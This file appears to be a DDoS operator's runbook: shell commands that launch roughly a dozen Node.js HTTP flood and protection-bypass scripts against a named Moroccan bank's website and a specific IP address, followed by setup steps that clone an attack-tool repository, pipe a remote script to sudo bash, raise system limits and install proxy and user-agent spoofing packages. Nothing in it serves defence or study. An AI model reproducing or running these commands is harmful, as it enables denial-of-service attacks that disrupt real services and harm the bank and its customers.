mv proxys.txt proxy.txt

 node DDG-BYPASS.js https://tls.mrrage.xyz/nginx_status 60 5 proxy.txt 64
 node HYPER.js https://www.cihbank.ma 60
 node HTTP-RAW.js https://www.cihbank.ma 300
 node HTTP-SOCKET.js https://www.cihbank.ma 64 30
 node HTTP-RAND.js https://www.cihbank.ma 300
 node HTTP-REQUESTS.js https://www.cihbank.ma 64 60
 node HTTP-BYPASS.js https://www.cihbank.ma 60
 node HTTP-PPS.js https://www.cihbank.ma 20 30
 node HTTPS-TLS.js https://www.cihbank.ma 30
 node UAM-RAPE.js https://www.cihbank.ma 5 120
 node c-http.js target time rate thread proxyfile
 node update.js target time rqs thread proxyfile

  GAME-UDP
query
tcpmtu
 sudo ./HTTP-SPAM GET https://www.cihbank.ma proxy.txt 300 999 5
 sudo ./HTTPS-MIX http://37.187.56.77 30 130






chmod 777 *
./install.sh
ls

sudo apt update
sudo apt upgrade
sudo apt install git 
sudo apt install npm
sudo apt install nodejs npm -y
sudo apt install unzip
sudo apt-get install build-essential
sudo apt-get update
sudo apt-get install vim
sudo apt-get install unrar-free
sudo apt-get install p7zip
git clone https://github.com/ggtest312/gfdgfdgfdg.git
cd gfdgfdgfdg
unzip 'new bypass.zip'
cd 'new bypass'
npm audit fix
chmod 777 *
ulimit -n 999999
ulimit -l unlimited

npm install fake-useragent
npm install cloudscraper
npm install requests
npm install https-proxy-agent
npm install axios
npm install randomstring
npm install shell_exec
sudo apt -y install curl dirmngr apt-transport-https lsb-release ca-certificates;curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -;sudo apt -y install nodejs;sudo apt -y install gcc g++ make;sudo apt -y install htop vnstat;sudo apt -y install screen;sudo apt -y install unrar;npm i events; npm i request; npm i os; npm i fs; npm i user-agents; npm i cluster; npm i cloudscraper; npm i header-generator; npm i checker-proxy; npm i fake-useragent; npm i url; npm i path; npm i net; npm i chalk;npm i sync-request;npm i random-useragent;npm i randomstring; npm i colors;npm i zombie;npm i random-useragent;sudo apt-get install unzip;echo
npm i checker-proxy
npm audit fix
chmod 777 *
ulimit -n 999999
ulimit -l unlimited
sh get.sh






